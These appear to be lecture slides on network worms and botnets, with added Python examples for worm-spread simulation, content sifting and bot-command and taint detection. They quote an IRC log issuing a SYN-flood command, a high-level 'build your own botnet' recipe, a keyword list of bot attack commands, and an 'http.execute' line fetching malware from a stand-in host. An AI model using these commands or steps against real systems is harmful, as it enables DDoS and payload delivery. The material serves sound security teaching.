Network Worms and Bots

Outline
Worms
• Worm examples and propagation methods
• Detection methods
  • Traffic patterns: EarlyBird
  • Vulnerabilities: Generic Exploit Blocking
• Disabling worms
  • Generate signatures for network or host-based filters
Bots
• Structure and use of bots
• Recognizing bot propagation
• Recognizing bot operation
  • Network-based methods
  • Host-based methods

Worm
A worm is self-replicating software designed to spread through the network
• Typically exploits security flaws in widely used services
• Can cause enormous damage
  • Launch DDoS attacks, install bot networks
  • Access sensitive information
  • Cause confusion by corrupting the sensitive information
Worm vs. virus vs. Trojan horse
• A virus is code embedded in a file or program
• Viruses and Trojan horses rely on human intervention
• Worms are self-contained and may spread autonomously

Cost of worm attacks
Morris worm, 1988
• Infected approximately 6,000 machines, 10% of computers connected to the Internet
• Cost ~ $10 million in downtime and cleanup
Code Red worm, July 16 2001
• Direct descendant of Morris’ worm
• Infected more than 500,000 servers
• Programmed to go into infinite sleep mode July 28
• Caused ~ $2.6 billion in damages
Love Bug worm: $8.75 billion
Statistics: Computer Economics Inc., Carlsbad, California

Internet Worm (first major attack)
• Released November 1988
• Program spread through Digital, Sun workstations
• Exploited Unix security vulnerabilities
  • VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code
Consequences
• No immediate damage from program itself
• Replication and threat of damage
  • Load on network, systems used in attack
  • Many systems shut down to prevent further attack

Some historical worms of note
Worm      Date   Distinction
Morris    11/88  Used multiple vulnerabilities, propagate to “nearby” systems
ADM       5/98   Random scanning of IP address space
Ramen     1/01   Exploited three vulnerabilities
Lion      3/01   Stealthy, rootkit worm
Cheese    6/01   Vigilante worm that secured vulnerable systems
Code Red  7/01   First significant Windows worm; completely memory resident
Walk      8/01   Recompiled source code locally
Nimda     9/01   Windows worm: client-to-server, c-to-c, s-to-s, …
Scalper   6/02   11 days after announcement of vulnerability; peer-to-peer network of compromised systems
Slammer   1/03   Used a single UDP packet for explosive growth
Source: Kienzle and Elder

Increasing propagation speed
Code Red, July 2001
• Affects Microsoft Index Server 2.0 and the Windows 2000 Indexing Service on Windows NT 4.0 and Windows 2000 systems that run IIS 4.0 and 5.0 web servers
• Exploits known buffer overflow in Idq.dll
• Vulnerable population (360,000 servers) infected in 14 hours
SQL Slammer, January 2003
• Affects Microsoft SQL 2000
• Exploits known buffer overflow vulnerability
  • Server Resolution service vulnerability reported June 2002
  • Patch released in July 2002, Bulletin MS02-39
• Vulnerable population infected in less than 10 minutes

Code Red
Initial version released July 13, 2001
• Sends its code as an HTTP request
• HTTP request exploits buffer overflow
• Malicious code is not stored in a file
  • Placed in memory and then run
When executed, worm checks for the file C:\Notworm
• If file exists, the worm thread goes into infinite sleep state
Creates new threads
• If the date is before the 20th of the month, the next 99 threads attempt to exploit more computers by targeting random IP addresses

Code Red of July 13 and July 19
Initial release of July 13
• 1st through 20th of month: spread via random scan of 32-bit IP address space
• 20th through end of each month: attack. Flooding attack against 198.137.240.91 (www.whitehouse.gov)
• Failure to seed random number generator leads to linear growth
Revision released July 19, 2001
• White House responds to threat of flooding attack by changing the address of www.whitehouse.gov
• Causes Code Red to die for date ≥ 20th of the month
• But: this time random number generator correctly seeded
Slides: Vern Paxson
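
Why the unseeded generator matters for growth, as an added simulation that is not part of the slides: a toy address space (SPACE, VULN and PROBES are constructed parameters) in which every infected instance either replays one shared probe sequence, as the July 13 Code Red did, or draws its own seed, as the July 19 revision did.

```python
import random

SPACE = 20_000       # constructed toy address space
VULN = 2_000         # constructed number of vulnerable hosts
PROBES = 5           # probes each infected instance sends per tick


def simulate(seeded: bool, ticks: int, seed: int = 1) -> list:
    """Return the infected-host count after each tick.

    seeded=False models the July 13 Code Red: every instance starts its
    generator from the same fixed state, so all copies replay one probe
    sequence and only the first instance ever reaches fresh addresses.
    seeded=True models the July 19 revision: each instance gets its own seed.
    """
    master = random.Random(seed)          # drives the experiment, not the worm
    vulnerable = set(master.sample(range(SPACE), VULN))

    def new_rng():
        return random.Random(master.getrandbits(64) if seeded else 0)

    infected = {min(vulnerable): new_rng()}   # patient zero and its generator
    history = []
    for _ in range(ticks):
        found = set()
        for rng in infected.values():
            for _ in range(PROBES):
                target = rng.randrange(SPACE)
                if target in vulnerable and target not in infected:
                    found.add(target)
        for host in found:                # newly infected start scanning next tick
            infected[host] = new_rng()
        history.append(len(infected))
    return history


def compare(ticks: int = 40):
    """Growth curves for the unseeded worm and the correctly seeded one."""
    return simulate(False, ticks), simulate(True, ticks)


if __name__ == "__main__":
    unseeded, seeded = compare()
    for t in range(0, 40, 5):
        print(f"tick {t:2d}: unseeded {unseeded[t]:5d}  seeded {seeded[t]:5d}")
```

With these parameters the shared-sequence worm gains roughly half a host per tick (only patient zero's probes ever land on unprobed addresses), while the seeded worm saturates the vulnerable population within a few dozen ticks.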

Code Red 2
• Released August 4, 2001
• Comment in code: “Code Red 2.” But in fact completely different code base
• Payload: a root backdoor, resilient to reboots
• Bug: crashes NT, only works on Windows 2000
• Localized scanning: prefers nearby addresses
• Kills Code Red 1
• Safety valve: programmed to die Oct 1, 2001
Slides: Vern Paxson

Striving for Greater Virulence: Nimda
• Released September 18, 2001
• Multi-mode spreading:
  • attack IIS servers via infected clients
  • email itself to address book as a virus
  • copy itself across open network shares
  • modifying Web pages on infected servers w/ client exploit
  • scanning for Code Red II backdoors (!)
• Worms form an ecosystem!
• Leaped across firewalls
Slides: Vern Paxson

[Figure: infected-host counts over time for Code Red 1, Code Red 2 and Nimda, annotated as follows]
• Code Red 2 kills off Code Red 1
• Code Red 2 settles into weekly pattern
• Nimda enters the ecosystem
• Code Red 2 dies off as programmed
• CR 1 returns thanks to bad clocks
Slides: Vern Paxson

How do worms propagate?
• Scanning worms: worm chooses “random” address
• Coordinated scanning: different worm instances scan different addresses
• Flash worms
  • Assemble tree of vulnerable hosts in advance, propagate along tree
  • Not observed in the wild, yet
  • Potential for 10^6 hosts in < 2 sec! [Staniford]
• Meta-server worm: ask server for hosts to infect (e.g., Google for “powered by phpbb”)
• Topological worm: use information from infected hosts (web server logs, email address books, config files, SSH “known hosts”)
• Contagion worm: propagate parasitically along with normally initiated communication

Worm Detection and Defense
Detect via honeyfarms: collections of “honeypots”
• Any outbound connection from honeyfarm = worm (at least, that’s the theory)
• Distill signature from inbound/outbound traffic
• If honeypot covers N addresses, expect detection when worm has infected 1/N of population
Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts
• 5 minutes to several weeks to write a signature
• Several hours or more for testing

Signature inference
• Monitor network and look for strings common to traffic with worm-like behavior
• Signatures can then be used for content filtering
Slide: S Savage

Content sifting
Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...)
Two consequences
• Content Prevalence: W will be more common in traffic than other bitstrings of the same length
• Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations
Content sifting: find W’s with high content prevalence and high address dispersion and drop that traffic
Slide: S Savage

The basic algorithm
[Figure, built up over five slides: a detector in the network watches traffic among hosts A, B, C, D, E and cnn.com. For each candidate string it keeps a Prevalence Table (number of packets carrying the string) and an Address Dispersion Table (distinct sources and distinct destinations). One string is seen a single time, from A to C: prevalence 1, sources {A}, destinations {C}. A second string is carried by successive packets whose sources grow to {B, D, E} and whose destinations grow to {A, B, D}, so its prevalence reaches 3 with three distinct sources and three distinct destinations. Rising prevalence together with rising dispersion is what marks the second string as worm content.]
(Stefan Savage, UCSD *)
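
The prevalence and address-dispersion tables from the slides above, as an added example that is not Savage's EarlyBird code: packets are cut into fixed-length substrings, each substring is counted once per packet, and anything that is both prevalent and dispersed is reported. The trace, the thresholds and the WINDOW length are constructed; real EarlyBird uses Rabin fingerprints and sampling instead of exhaustive substrings.

```python
from collections import defaultdict

WINDOW = 16          # length of the substrings sifted from each payload
PREVALENCE_MIN = 3   # packets that must carry a substring
DISPERSION_MIN = 3   # distinct sources and distinct destinations required


def substrings(payload: bytes):
    """Distinct WINDOW-byte substrings of one payload (counted once per packet)."""
    return {payload[i:i + WINDOW] for i in range(len(payload) - WINDOW + 1)}


def sift(packets):
    """packets: iterable of (src, dst, payload). Return substrings flagged as worm content."""
    prevalence = defaultdict(int)   # prevalence table: packets carrying W
    sources = defaultdict(set)      # address dispersion table: distinct sources of W
    dests = defaultdict(set)        # address dispersion table: distinct destinations of W
    for src, dst, payload in packets:
        for w in substrings(payload):
            prevalence[w] += 1
            sources[w].add(src)
            dests[w].add(dst)
    return {w for w, n in prevalence.items()
            if n >= PREVALENCE_MIN
            and len(sources[w]) >= DISPERSION_MIN
            and len(dests[w]) >= DISPERSION_MIN}


# Constructed trace: A fetches the same page from cnn.com three times (prevalent
# but not dispersed) while B, D and E send one invariant blob to A, B and D
# (prevalent and dispersed), matching the tables in the slides above.
PAGE = b"GET /index.html HTTP/1.0\r\nHost: cnn.com\r\n\r\n"
INVARIANT = b"GET /vuln.dll?" + b"A" * 32 + b" HTTP/1.0\r\n"
TRACE = [
    ("A", "cnn.com", PAGE), ("A", "cnn.com", PAGE), ("A", "cnn.com", PAGE),
    ("A", "C", b"short benign message"),
    ("B", "A", INVARIANT), ("D", "B", INVARIANT), ("E", "D", INVARIANT),
]

if __name__ == "__main__":
    for w in sorted(sift(TRACE)):
        print(w)
```

Only substrings of the invariant blob are flagged; the repeated cnn.com page reaches the prevalence threshold but has a single source, so address dispersion keeps it out.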

Challenges
Computation
• To support a 1Gbps line rate we have 12µs to process each packet, at 10Gbps 1.2µs, at 40Gbps…
• Dominated by memory references; state expensive
• Content sifting requires looking at every byte in a packet
State
• On a fully-loaded 1Gbps link a naïve implementation can easily consume 100MB/sec for table
• Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM
(Stefan Savage, UCSD *)

Worm summary
Worm attacks
• Many ways for worms to propagate
• Propagation time is increasing
• Polymorphic worms, other barriers to detection
Detect
• Traffic patterns: EarlyBird
• Watch attack: TaintCheck and Sting
• Look at vulnerabilities: Generic Exploit Blocking
Disable
• Generate worm signatures and use in network or host-based filters

Botnet
• Collection of compromised hosts
  • Spread like worms and viruses
  • Once installed, respond to remote commands
• Platform for many attacks
  • Spam forwarding (70% of all spam?)
  • Click fraud
  • Keystroke logging
  • Distributed denial of service attacks
• Serious problem
  • Top concern of banks, online merchants
  • Vint Cerf: ¼ of hosts connected to Internet

What are botnets used for?
[Table: capabilities of six bot families (columns ago, DSNX, evil, G-SyS, sd, Spy), marked √ where a family has the capability; number of families marked per row:]
capability               families marked
create port redirect     5
other proxy              1
download file from web   5
DNS resolution           3
UDP/ping floods          4
other DDoS floods        3
scan/spread              5
spam                     1
visit URL                3
Capabilities are exercised via remote commands.

Building a Bot Network
[Figure, step 1: an attacker sends compromise attempts to several hosts (Win XP, FreeBSD, Mac OS X, Win XP). The two Win XP hosts are compromised and bot software is installed on them.]

Step 2
[Figure: each compromised Win XP host issues “. . . /connect jade.va.us.dal.net /join #hacker . . .” and rallies at the IRC server jade.va.dal.net]

Step 3
(12:59:27pm) -- A9-pcgbdv ([email protected]) has joined (#owned) Users : 1646
(12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62
(12:59:27pm) -- A6-bpxufrd ([email protected]) has joined (#owned) Users : 1647
(12:59:27pm) -- A9-nzmpah ([email protected]) has left IRC (Connection reset by peer)
(12:59:28pm) (@PhaTTy) .scan.enable DCOM
(12:59:28pm) -- A9-tzrkeasv ([email protected]) has joined (#owned) Users : 1650

• Spam service
• Rent-a-bot
• Cash-out
• Pump and dump
• Botnet rental

Underground commerce
Market in access to bots
• Botherd: collects and manages bots
• Access to proxies (“peas”) sold to spammers, often with commercial-looking web interface
• Sample rates
  • Non-exclusive access to botnet: 10¢ per machine
  • Exclusive access: 25¢
  • Payment via compromised account (e.g. PayPal) or cash to dropbox
Identity theft
• Keystroke logging
• Complete identities available for $25 - $200+
  • Rates depend on financial situation of compromised person
  • Include all info from PC files, plus all websites of interest with passwords/account info used by PC owner
  • At $200+, usually includes full credit report
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]

Sobig.a in action
• Arrives as an email attachment
  • Written in C++
  • Encrypted with Telock to slow analysis
• User opens attachment, launching trojan
• Downloads file from a free Geocities account
  • Contains list of URLs pointing to second stage
• Fetches second-stage trojan
  • Arbitrary executable file – could be anything
  • For Sobig.a, second-stage trojan is Lala

Stage 2 – Lala
Communication
• Lala notifies a cgi script on a compromised host
• Different versions of Lala have different sites and cgi scripts, perhaps indicating tracking by author
Installation
• Lala installs a keylogger and password-protected Lithium remote access trojan
• Lala downloads Stage 3 trojan: Wingate proxy (commercial software)
Cleanup
• Lala removes the Sobig.a trojan

Stage 3 – Wingate
Wingate is a general-purpose port proxy server
• 555/TCP – RTSP
• 608/TCP – Remote Control Service
• 1180/TCP – SOCKS
• 1181/TCP – Telnet Proxy
• 1182/TCP – WWW Proxy
• 1183/TCP – FTP Proxy
• 1184/TCP – POP3 Proxy
• 1185/TCP – SMTP Server
Final state of compromised machine
• Complete remote control by Lithium client with password “adm123”
• Complete logging of user’s keystrokes
• Usable for spam relay, http redirects
• Wingate Gatekeeper client can connect to 608/TCP, can log/change everything

Build Your Own Botnet
Pick a vector mechanism
• IRC Channels: DCC Filesends, Website Adverts to Exploit Sites
• Scan & Sploit: MSBlast
• Trojan: SoBig/BugBear/ActiveX Exploits
Choose a Payload
• Backdoors: Agobot, SubSeven, DeepThroat
• Most include mechanisms for DDoS, self-spreading, download/exec arbitrary code, password stealers
Do it
• Compromise an IRC server, or use your own zombied machines
• Configure Payload to connect to selected server
• Load encryption keys and codes
• Release through appropriate compromised systems
• Sit back and wait, or start on your next Botnet
[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board]

Bot detection methods
• Signature-based (most AV products)
• Rule-based
  • Monitor outbound network connections (e.g. ZoneAlarm, BINDER)
  • Block certain ports (25, 6667, ...)
• Hybrid: content-based filtering
  • Match network packet contents to known command strings (keywords)
  • E.g. Gaobot ddos cmds: .ddos.httpflood
• Network traffic monitoring
  • Wenke Lee, Phil Porras: BotHunter, … Correlate various NIDS alarms to identify “bot infection sequence”
  • GA Tech: Recognize traffic patterns associated with ddns-based rallying
  • Stuart Staniford, FireEye: Detect port scanning to identify suspicious traffic; emulate host with taint tracking to identify exploit
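
The hybrid content-based filtering above, as an added example that is not from the slides or from any named product: IRC lines are matched against the command keywords the slides quote (.ddos.synflood, .ddos.httpflood, .scan.enable, http.execute), and joins to one channel are counted per timestamp to expose the mass rallying seen in the Step 3 log. The sample lines are constructed after that log, with documentation addresses in place of real hosts.

```python
import re
from collections import Counter

# Command keywords quoted in the slides; a real deployment extends this list.
BOT_COMMANDS = ("ddos.synflood", "ddos.httpflood", "scan.enable", "http.execute")

CMD_RE = re.compile(r"^\((?P<ts>[^)]+)\) \(@(?P<op>\S+)\) \.?(?P<cmd>[a-z]+\.[a-z]+)(?P<args>.*)$")
JOIN_RE = re.compile(r"^\((?P<ts>[^)]+)\) -- (?P<nick>\S+) \([^)]*\) has joined \((?P<chan>[^)]+)\)")


def find_commands(lines):
    """(timestamp, operator, command, args) for each line carrying a known bot command."""
    hits = []
    for line in lines:
        m = CMD_RE.match(line)
        if m and m["cmd"] in BOT_COMMANDS:
            hits.append((m["ts"], m["op"], m["cmd"], m["args"].strip()))
    return hits


def join_bursts(lines, threshold=3):
    """{(channel, timestamp): joins} for every channel joined >= threshold times in one second."""
    counts = Counter()
    for line in lines:
        m = JOIN_RE.match(line)
        if m:
            counts[(m["chan"], m["ts"])] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


# Constructed sample modelled on the Step 3 log; hosts use documentation addresses.
SAMPLE = [
    "(12:59:27pm) -- A9-pcgbdv (bot@198.51.100.10) has joined (#owned) Users : 1646",
    "(12:59:27pm) (@PhaTTy) .ddos.synflood 192.0.2.7",
    "(12:59:27pm) -- A6-bpxufrd (bot@198.51.100.11) has joined (#owned) Users : 1647",
    "(12:59:27pm) -- A9-nzmpah (bot@198.51.100.12) has left IRC (Connection reset by peer)",
    "(12:59:27pm) -- A9-tzrkeasv (bot@198.51.100.13) has joined (#owned) Users : 1650",
    "(12:59:28pm) (@PhaTTy) .scan.enable DCOM",
    "(12:59:28pm) (@alice) hello everyone, .net is down again",
]

if __name__ == "__main__":
    print(find_commands(SAMPLE))
    print(join_bursts(SAMPLE))
```

The chatter line from @alice shows the weakness of keyword matching: it is only as good as the keyword list, which is why the slides pair it with traffic-pattern monitoring.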

What is BotHunter?
[Embedded slide from the botHunter talk, listing its outline: Introduction; Approaches to Privacy-Preserving Correlation; A Cyber-TA Distributed Correlation Example – botHunter; botHunter Sensors; Correlation Framework; Example botHunter Output; Cyber-TA Integration]
BotHunter: passive bot detection
• Snort-based sensor suite for malware event detection
  • inbound scan detection
  • remote to local exploit detection
  • anomaly detection system for exploits over key TCP protocols
  • botnet-specific egg download banners
  • victim-to-C&C-based communications exchanges, particularly for IRC bot protocols
• Event correlator combines information from sensors to recognize bots that infect and coordinate with your internal network assets
• Submits “bot-detection profiles” to the Cyber-TA repository infrastructure

Botnet network traffic patterns
Unique characteristic: “rallying”
• Bots spread like worms and trojans
• Payloads may be common backdoors
• Centralized control of botnet is characteristic feature
Georgia Tech idea: DNS
• Bots installed at network edge
• IP addresses may vary, use Dynamic DNS
• Bots talk to controller, make DDNS lookup
• Pattern of DDNS lookup is easy to spot for common botnets!
David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)

BotSwat
Host-based bot detection
• Based on idea of remote control commands

What does remote control look like?
• Invoke system calls: connect, network send and recv, create file, write file, …
• On arguments received over the network: IP to connect to, object to request, file name, …
BotSwat premise
• We can distinguish the behavior of bots from that of innocuous processes via detecting “remote control”
• We can approximate “remote control” as “using data received over the network in a system call argument”
  http.execute <URL> <local_path>

[Figure: a Windows XP host running agobot receives “http.execute www.badguy.com/malware.exe C:\WIN\bad.exe” through its NIC. The bot then issues connect(…,www.badguy.com,…), send(…,“…GET /malware.exe…”,…) and fcreate(…,“C:\WIN\malware.exe”,…); each numbered step passes data that arrived over the network into a system call argument.]
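
The BotSwat premise above, as an added toy taint tracker that is not BotSwat's implementation: values received from the network are wrapped as Tainted, string operations derived from them keep the tag, and shims around connect, send and fcreate report remote control when a tagged value reaches a system call argument. The names Tainted, SyscallMonitor, run_bot and run_benign are assumptions; the http.execute command, the jade.va.dal.net origin and the www.badguy.com and C:\WIN\bad.exe values are taken from the slides.

```python
class Tainted:
    """A string value tagged with the network peer it was derived from."""
    def __init__(self, value: str, origin: str):
        self.value, self.origin = value, origin

    def split(self, sep=None, maxsplit=-1):      # every piece inherits the taint
        return [Tainted(p, self.origin) for p in self.value.split(sep, maxsplit)]

    def __add__(self, other):                    # concatenation keeps the taint
        return Tainted(self.value + str(other), self.origin)

    def __radd__(self, other):
        return Tainted(str(other) + self.value, self.origin)


def recv(peer: str, payload: str) -> Tainted:
    """Stand-in for the socket recv(): everything from the network is tainted."""
    return Tainted(payload, peer)


class SyscallMonitor:
    """Shim in front of the system calls; a tainted argument means remote control."""
    def __init__(self):
        self.alerts = []

    def _check(self, syscall, arg):
        if isinstance(arg, Tainted):
            self.alerts.append((syscall, arg.value, arg.origin))

    def connect(self, host): self._check("connect", host)
    def send(self, data):    self._check("send", data)
    def fcreate(self, path): self._check("fcreate", path)


def run_bot(monitor, command):
    """Hypothetical agobot-style handler for 'http.execute <URL> <local_path>'."""
    _verb, url, local_path = command.split()
    host, path = url.split("/", 1)
    monitor.connect(host)                               # host came from the network
    monitor.send("GET /" + path + " HTTP/1.0\r\n")      # request built from it
    monitor.fcreate(local_path)                         # file name came from the network
    return monitor.alerts


def run_benign(monitor):
    """A process whose call arguments come from local configuration only."""
    monitor.connect("update.example.com")
    monitor.fcreate("C:\\WIN\\settings.ini")
    return monitor.alerts
```

A value laundered through str() loses its tag, and a legitimate downloader that names a file after a server-supplied header would alert too; both are limits of the approximation in the premise, which is why BotSwat treats this as a heuristic rather than a proof of bot behaviour.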